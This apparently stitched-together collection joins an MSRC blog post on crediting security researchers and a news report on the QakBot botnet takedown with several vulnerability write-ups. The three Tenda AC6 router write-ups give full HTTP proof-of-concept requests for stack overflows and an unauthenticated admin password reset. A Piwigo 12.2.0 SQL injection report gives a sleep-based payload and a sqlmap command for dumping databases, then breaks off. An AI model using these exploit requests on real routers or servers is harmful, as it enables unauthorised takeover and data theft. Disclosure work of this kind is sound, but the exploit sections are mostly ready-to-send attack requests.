This is the first of a series of blog entries to give some insight into the Microsoft Security Response Center (MSRC) business and how we work with security researchers and vulnerability reports.
The Microsoft Security Response Center actively recognizes those security researchers who help us to protect our several billion customers and their endpoints in several ways.

This is the first of a series of blog entries to give some insight into the Microsoft Security Response Center (MSRC) business and how we work with security researchers and vulnerability reports.

The Microsoft Security Response Center actively recognizes those security researchers who help us to protect our several billion customers and their endpoints in several ways. We split our acknowledgments into three distinct categories, CVE qualified submissions, online services, and bug bounty. It is possible that a single submission will be acknowledged by one or more of these categories. We update our acknowledgements each month with the latest findings and submissions.

When it comes to recognizing our researchers through Coordinated Vulnerability Disclosure (CVD), if the finding that was submitted was impactful enough to be addressed in our monthly bulletin release (more on that in our next blog) it will be assigned a CVE number that is credited to the researcher. The researcher and their associated CVE are acknowledged monthly here in the MSRC Security Update Guide.

Our Online Services Security Researcher Acknowledgements credit those researchers who are involved with making our online platforms safer by not only submitting their findings, but also working closely with us to fix vulnerabilities discovered during their research. We draw an immense body of knowledge and capability through direct engagement with security researchers who test and evaluate our online services spaces. Together with our Operational Security Assessment work, we are constantly improving our offerings and providing a secure experience to our customers globally.

Finally, the Microsoft Bug Bounty program offers a unique acknowledgment platform to reward security researchers with cash and other prizes for submitting their findings inside of our eligible bounty programs. Security researchers (aka “Bounty Hunters”) can potentially earn anywhere between five hundred dollars and two hundred fifty thousand dollars for each submission to the Microsoft Bug Bounty program. Currently we offer nine different bounty programs where there is an opportunity to earn money for submissions.

The security community is full of great research and insight, we all succeed when we come together on a common platform. We appreciate working with security researchers to better customer security and ensure our products and services continue to evolve with the threat landscape. Public acknowledgements are just one way we want to interact and support security research in the community. A big thank you to all the researchers that have and continue to engage directly with us.

Our next blog entry will look at what sort of reports go into our monthly security update cycle. Stay tuned.

Phillip Misner,

Principal Security Group Manager

Microsoft Security Response Center

Inside the MSRC – How we recognize our researchers

The U.S. government today announced a coordinated crackdown against QakBot, a complex malware family used by multiple cybercrime groups to lay the groundwork for ransomware infections. The international law enforcement operation involved seizing control over the botnet's online infrastructure, and quietly removing the Qakbot malware from tens of thousands of infected Microsoft Windows computer systems.

The U.S. government today announced a coordinated crackdown against **QakBot**, a complex malware family used by multiple cybercrime groups to lay the groundwork for ransomware infections. The international law enforcement operation involved seizing control over the botnet’s online infrastructure, and quietly removing the Qakbot malware from tens of thousands of infected Microsoft Windows computers.

Dutch authorities inside a data center with servers tied to the botnet. Image: Dutch National Police.

In an international operation announced today dubbed “**Duck Hunt**,” the **U.S. Department of Justice** (DOJ) and **Federal Bureau of Investigation** (FBI) said they obtained court orders to remove Qakbot from infected devices, and to seize servers used to control the botnet.

“This is the most significant technological and financial operation ever led by the Department of Justice against a botnet,” said **Martin Estrada**, the U.S. attorney for the Southern District of California, at a press conference this morning in Los Angeles.

Estrada said Qakbot has been implicated in 40 different ransomware attacks over the past 18 months, intrusions that collectively cost victims more than $58 million in losses.

Emerging in 2007 as a banking trojan, QakBot (a.k.a. **Qbot** and **Pinkslipbot**) has morphed into an advanced malware strain now used by multiple cybercriminal groups to prepare newly compromised networks for ransomware infestations. QakBot is most commonly delivered via email phishing lures disguised as something legitimate and time-sensitive, such as invoices or work orders.

**Don Alway**, assistant director in charge of the FBI’s Los Angeles field office, said federal investigators gained access to an online panel that allowed cybercrooks to monitor and control the actions of the botnet. From there, investigators obtained court-ordered approval to instruct all infected systems to uninstall Qakbot and to disconnect themselves from the botnet, Alway said.

The DOJ says their access to the botnet’s control panel revealed that Qakbot had been used to infect more than 700,000 machines in the past year alone, including 200,000 systems in the United States.

Working with law enforcement partners in France, Germany, Latvia, the Netherlands, Romania and the United Kingdom, the DOJ said it was able to seize more than 50 Internet servers tied to the malware network, and nearly $9 million in ill-gotten cryptocurrency from QakBot’s cybercriminal overlords. The DOJ declined to say whether any suspects were questioned or arrested in connection with Qakbot, citing an ongoing investigation.

According to recent figures from the managed security firm **Reliaquest**, QakBot is by far the most prevalent malware “loader” — malicious software used to secure access to a hacked network and help drop additional malware payloads. Reliaquest says QakBot infections accounted for nearly one-third of all loaders observed in the wild during the first six months of this year.

Qakbot/Qbot was once again the top malware loader observed in the wild in the first six months of 2023. Source: Reliaquest.com.

Researchers at **AT&T Alien Labs** say the crooks responsible for maintaining the QakBot botnet have rented their creation to various cybercrime groups over the years. More recently, however, QakBot has been closely associated with ransomware attacks from **Black Basta**, a prolific Russian-language criminal group that was thought to have spun off from the Conti ransomware gang in early 2022.

Today’s operation is not the first time the U.S. government has used court orders to remotely disinfect systems compromised with malware. In April 2022, the DOJ quietly removed malware from computers around the world infected by the “Snake” malware, an even older malware family that has been tied to the GRU, an intelligence arm of the Russian military.

Documents published by the DOJ in support of today’s takedown state that beginning on Aug. 25, 2023, law enforcement gained access to the Qakbot botnet, redirected botnet traffic to and through servers controlled by law enforcement, and instructed Qakbot-infected computers to download a Qakbot Uninstall file that uninstalled Qakbot malware from the infected computer.

“The Qakbot Uninstall file did not remediate other malware that was already installed on infected computers,” the government explained. “Instead, it was designed to prevent additional Qakbot malware from being installed on the infected computer by untethering the victim computer from the Qakbot botnet.”

The DOJ said it also recovered more than 6.5 million stolen passwords and other credentials, and that it has shared this information with two websites that let users check to see if their credentials were exposed: Have I Been Pwned, and a “Check Your Hack” website erected by the **Dutch National Police**.

Further reading:

–The DOJ’s application for a search warrant application tied to Qakbot uninstall file (PDF)  
–The search warrant application connected to QakBot server infrastructure in the United States (PDF)  
–The government’s application for a warrant to seize virtual currency from the QakBot operators (PDF)

U.S. Hacks QakBot, Quietly Removes Botnet Infections

Cross-Site Request Forgery (CSRF) in GitHub repository pkp/ojs prior to 3.3.0-16.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-5626: pkp/pkp-lib#9407 Add CSRF check to payment types form · pkp/ojs@99a9f39

Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the endip parameter in the SetPptpServerCfg function.

**Tenda AC6 V15.03.05.09\_multi Unauthorized stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn/profile/contact.html
*   Firmware download address ： https://www.tenda.com.cn/download/default.html

**1\. Affected version**

![image-20220215174142153](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/17/img/image-20220215174142153.png)

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details****2.1Arbitrary password modification vulnerability**

![image-20220215175103625](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/17/img/image-20220215175103625.png)

![image-20220215175441246](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/17/img/image-20220215175441246.png)

![image-20220215175631393](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/17/img/image-20220215175631393.png)

Firstly, through reverse analysis, we can find that there is a vulnerability of arbitrary password modification in the interface.The program passes the contents obtained in the loginpwd parameter directly to V16, and then directly changes the password to the login password through the setvalue() function. In this way, we can change the management password without authorization.

**2.2Stack overflow vulnerability**

![image-20220217155029627](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/17/img/image-20220217155029627.png)

The content obtained by the program through the parameter endip is passed to v19

![image-20220217155045633](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/17/img/image-20220217155045633.png)

Then, through sscanf function and regular expression, the matched content is formatted into the stack of V9, V10, V11 and V12. There is no size check, so there is a stack overflow vulnerability.

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V15.03.05.09\_multi
2.  Attack with the following overflow POC attacks

    POST /goform/SetPptpServerCfg HTTP/1.1
    Host: 192.168.1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 1564
    Origin: http://192.168.1.1
    Connection: close
    Referer: http://192.168.1.1/pptp_server.html?random=0.039770115229594394&
    Cookie: password=e10adc3949ba59abbe56e057f20f883eepe1qw
    
    serverEn=1&startIp=10.0.0.100&endIp=10.0.0.200aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae&mppe=0&mppeOp=128
    

The reproduction results are as follows:

![image-20220214114614959](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/17/img/image-20220214114614959.png)

Figure 2 POC attack effect

3.Unauthorized password rewriting POC（The password here is changed to 123456）

    POST /goform/fast_setting_wifi_set HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: /
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 116
    Origin: http://192.168.0.1
    Connection: close
    Referer: http://192.168.0.1/index.html
    
    ssid=Tenda_AC6_rencvn&wrlPassword=rencvn667&power=high&timeZone=%2B08%3A00&loginPwd=e10adc3949ba59abbe56e057f20f883e
    

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell without authorization

![image-20220215180128600](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/17/img/image-20220215180128600.png)

CVE-2022-25460: IOT_vuln/Tenda/AC6/17 at main · EPhaha/IOT_vuln

Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the schedendtime parameter in the openSchedWifi function.

**Tenda AC6 V15.03.05.09\_multi Unauthorized stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn/profile/contact.html
*   Firmware download address ： https://www.tenda.com.cn/download/default.html

**1\. Affected version**

![image-20220215174142153](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/4/img/image-20220215174142153.png)

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details****2.1Arbitrary password modification vulnerability**

![image-20220215175103625](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/4/img/image-20220215175103625.png)

![image-20220215175441246](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/4/img/image-20220215175441246.png)

![image-20220215175631393](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/4/img/image-20220215175631393.png)

Firstly, through reverse analysis, we can find that there is a vulnerability of arbitrary password modification in the interface.The program passes the contents obtained in the loginpwd parameter directly to V16, and then directly changes the password to the login password through the setvalue() function. In this way, we can change the management password without authorization.

**2.2Stack overflow vulnerability**

![image-20220215181224260](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/4/img/image-20220215181224260.png)

![image-20220215181229759](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/4/img/image-20220215181229759.png)

The program passes the parameters obtained from schedendtime to V20, and then directly copies V20 on the stack through the strcpy function. There is no size check, so there is a stack overflow vulnerability.

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V15.03.05.09\_multi
2.  Attack with the following overflow POC attacks

    POST /goform/openSchedWifi HTTP/1.1
    Host: 192.168.1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 1602
    Origin: http://192.168.1.1
    Connection: close
    Referer: http://192.168.1.1/wifi_time.html?random=0.2685288037929373&
    Cookie: password=7c90ed4e4d4bf1e300aa08103057ccbchrb1qw
    
    schedWifiEnable=1&schedStartTime=00%3A00&schedEndTime=01%3A00aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae&timeType=0&day=1%2C1%2C1%2C1%2C1%2C1%2C1
    

The reproduction results are as follows:

![image-20220214114614959](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/4/img/image-20220214114614959.png)

Figure 2 POC attack effect

3.Unauthorized password rewriting POC（The password here is changed to 123456）

    POST /goform/fast_setting_wifi_set HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: /
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 116
    Origin: http://192.168.0.1
    Connection: close
    Referer: http://192.168.0.1/index.html
    
    ssid=Tenda_AC6_rencvn&wrlPassword=rencvn667&power=high&timeZone=%2B08%3A00&loginPwd=e10adc3949ba59abbe56e057f20f883e
    

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell without authorization

![image-20220215180128600](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/4/img/image-20220215180128600.png)

CVE-2022-25447: IOT_vuln/Tenda/AC6/4 at main · EPhaha/IOT_vuln

Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the startip parameter in the SetPptpServerCfg function.

**Tenda AC6 V15.03.05.09\_multi Unauthorized stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn/profile/contact.html
*   Firmware download address ： https://www.tenda.com.cn/download/default.html

**1\. Affected version**

![image-20220215174142153](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/16/img/image-20220215174142153.png)

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details****2.1Arbitrary password modification vulnerability**

![image-20220215175103625](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/16/img/image-20220215175103625.png)

![image-20220215175441246](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/16/img/image-20220215175441246.png)

![image-20220215175631393](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/16/img/image-20220215175631393.png)

Firstly, through reverse analysis, we can find that there is a vulnerability of arbitrary password modification in the interface.The program passes the contents obtained in the loginpwd parameter directly to V16, and then directly changes the password to the login password through the setvalue() function. In this way, we can change the management password without authorization.

**2.2Stack overflow vulnerability**

![image-20220217154910431](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/16/img/image-20220217154910431.png)

The content obtained by the program through the parameter startip is passed to V20

![image-20220217154921233](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/16/img/image-20220217154921233.png)

Then, through sscanf function, the content of regular expression matching is passed to the stack of V13, V14 and V15. There is no size check, and there is a stack overflow vulnerability.

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V15.03.05.09\_multi
2.  Attack with the following overflow POC attacks

    POST /goform/SetPptpServerCfg HTTP/1.1
    Host: 192.168.1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 1564
    Origin: http://192.168.1.1
    Connection: close
    Referer: http://192.168.1.1/pptp_server.html?random=0.039770115229594394&
    Cookie: password=e10adc3949ba59abbe56e057f20f883eepe1qw
    
    serverEn=1&startIp=10.0.0.100aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae&endIp=10.0.0.200&mppe=0&mppeOp=128
    

The reproduction results are as follows:

![image-20220214114614959](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/16/img/image-20220214114614959.png)

Figure 2 POC attack effect

3.Unauthorized password rewriting POC（The password here is changed to 123456）

    POST /goform/fast_setting_wifi_set HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    Accept: /
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 116
    Origin: http://192.168.0.1
    Connection: close
    Referer: http://192.168.0.1/index.html
    
    ssid=Tenda_AC6_rencvn&wrlPassword=rencvn667&power=high&timeZone=%2B08%3A00&loginPwd=e10adc3949ba59abbe56e057f20f883e
    

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell without authorization

![image-20220215180128600](https://github.com/EPhaha/IOT_vuln/raw/main/Tenda/AC6/16/img/image-20220215180128600.png)

CVE-2022-25461: IOT_vuln/Tenda/AC6/16 at main · EPhaha/IOT_vuln

Piwigo v12.2.0 was discovered to contain a SQL injection vulnerability via pwg.users.php.

**Vulnerability details**

**vulnerability type:** SQL injection

**vulnerability versions:** piwigo 12.2.0

**vulnerability Url:** http://10.92.66.148/piwigo/ws.php?format=json&method=pwg.users.getList

**SQL injected fields exist**：**order**

**verification procedure**

log on to the system and go user-Management-user list ![image.png](https://camo.githubusercontent.com/7618a048d3671fcbb2d5481eae2fb091c0f33102d22bd2546ede3e9736fa0672/68747470733a2f2f63646e2e6e6c61726b2e636f6d2f79757175652f302f323032322f706e672f3439363139322f313634353639343334393631322d34386264316531362d326138362d343736352d383636302d6364343963626535646136332e706e6723636c69656e7449643d7531356164323763632d663565312d342663726f703d302663726f703d302663726f703d312663726f703d312666726f6d3d7061737465266865696768743d3635372669643d753164313432666131266d617267696e3d2535426f626a6563742532304f626a656374253544266e616d653d696d6167652e706e67266f726967696e4865696768743d363537266f726967696e57696474683d31393230266f726967696e616c547970653d62696e61727926726174696f3d3126726f746174696f6e3d302673686f775469746c653d66616c73652673697a653d3838303330267374617475733d646f6e65267374796c653d6e6f6e65267461736b49643d7530396365373333382d386432302d346363392d396339652d6239366538376562623631267469746c653d2677696474683d31393230) Vulnerability Data：

POST /piwigo/ws.php?format\=json&method\=pwg.users.getList HTTP/1.1
Host: 10.92.66.148
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 101
Origin: http://10.92.66.148
Connection: close
Referer: http://10.92.66.148/piwigo/admin.php?page=user\_list
Cookie: pwg\_id=pkl5bk0ifq21ss8nb2j126u55j; pwg\_display\_thumbnail=no\_display\_thumbnail; pwg\_album\_manager\_view=tile; pwg\_plugin\_manager\_view=classic; pwg\_user\_manager\_view=line; PHPSESSID=2a8da2cbc685d8412cbf8e64
display=all&order=(select\*from(select+sleep(5)union/\*\*/select+1)a)&page\=0&per\_page\=5&exclude%5B%5D\=2

Modify the exclude\[\] field and use Sleep(5) to execute SQL statements with a delay of 5 seconds. As shown in the following figure, data is returned with a delay of 5 seconds, proving that SQL injection exists: ![image.png](https://camo.githubusercontent.com/747140c17631012594a721564ae93010905ddf5727c1b2e94a005d440161fb92/68747470733a2f2f63646e2e6e6c61726b2e636f6d2f79757175652f302f323032322f706e672f3439363139322f313634353639353038333736332d65653863386663392d383936642d343735632d383431382d3962666464623338663737362e706e6723636c69656e7449643d7562353665386430332d643537352d342663726f703d302663726f703d302663726f703d312663726f703d312666726f6d3d7061737465266865696768743d3936332669643d753936396431643166266d617267696e3d2535426f626a6563742532304f626a656374253544266e616d653d696d6167652e706e67266f726967696e4865696768743d393633266f726967696e57696474683d31393230266f726967696e616c547970653d62696e61727926726174696f3d3126726f746174696f6e3d302673686f775469746c653d66616c73652673697a653d313936353836267374617475733d646f6e65267374796c653d6e6f6e65267461736b49643d7561376466356438662d376539322d343834372d396235662d3863633436646561633738267469746c653d2677696474683d31393230) Use SQLmap to verify vulnerabilities. Data packets are marked as injection points:

POST /piwigo/ws.php?format\=json&method\=pwg.users.getList HTTP/1.1
Host: 10.92.66.148
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 55
Origin: http://10.92.66.148
Connection: close
Referer: http://10.92.66.148/piwigo/admin.php?page=user\_list
Cookie: pwg\_id=pkl5bk0ifq21ss8nb2j126u55j; pwg\_display\_thumbnail=no\_display\_thumbnail; pwg\_album\_manager\_view=tile; pwg\_plugin\_manager\_view=classic; pwg\_user\_manager\_view=line; PHPSESSID=2a8da2cbc685d8412cbf8e64
display=all&order=\*&page=0&per\_page=5&exclude%5B%5D=2

Execution Parameters **py -3 sqlmap.py -r text.txt --batch --dbs** ![image.png](https://camo.githubusercontent.com/7ba72d70b9e2b468754530c69cca427ee1eb73ee4eb84813ccafeaba82ad08aa/68747470733a2f2f63646e2e6e6c61726b2e636f6d2f79757175652f302f323032322f706e672f3439363139322f313634353639343931363530352d35656262396535362d643131342d343332612d383431662d3930643338343037666463622e706e6723636c69656e7449643d7562353665386430332d643537352d342663726f703d302663726f703d302663726f703d312663726f703d312666726f6d3d7061737465266865696768743d3637302669643d753162316330306630266d617267696e3d2535426f626a6563742532304f626a656374253544266e616d653d696d6167652e706e67266f726967696e4865696768743d363730266f726967696e57696474683d31373132266f726967696e616c547970653d62696e61727926726174696f3d3126726f746174696f6e3d302673686f775469746c653d66616c73652673697a653d3739313932267374617475733d646f6e65267374796c653d6e6f6e65267461736b49643d7530386334393539302d303134642d343333352d613034332d3536613833306530643064267469746c653d2677696474683d31373132) You can see that the database name has been read, so you can Dump sensitive data directly from the database. Furthermore, if the database has DBA privileges, an attacker can take over the server. ​

**Vulnerability analysis**

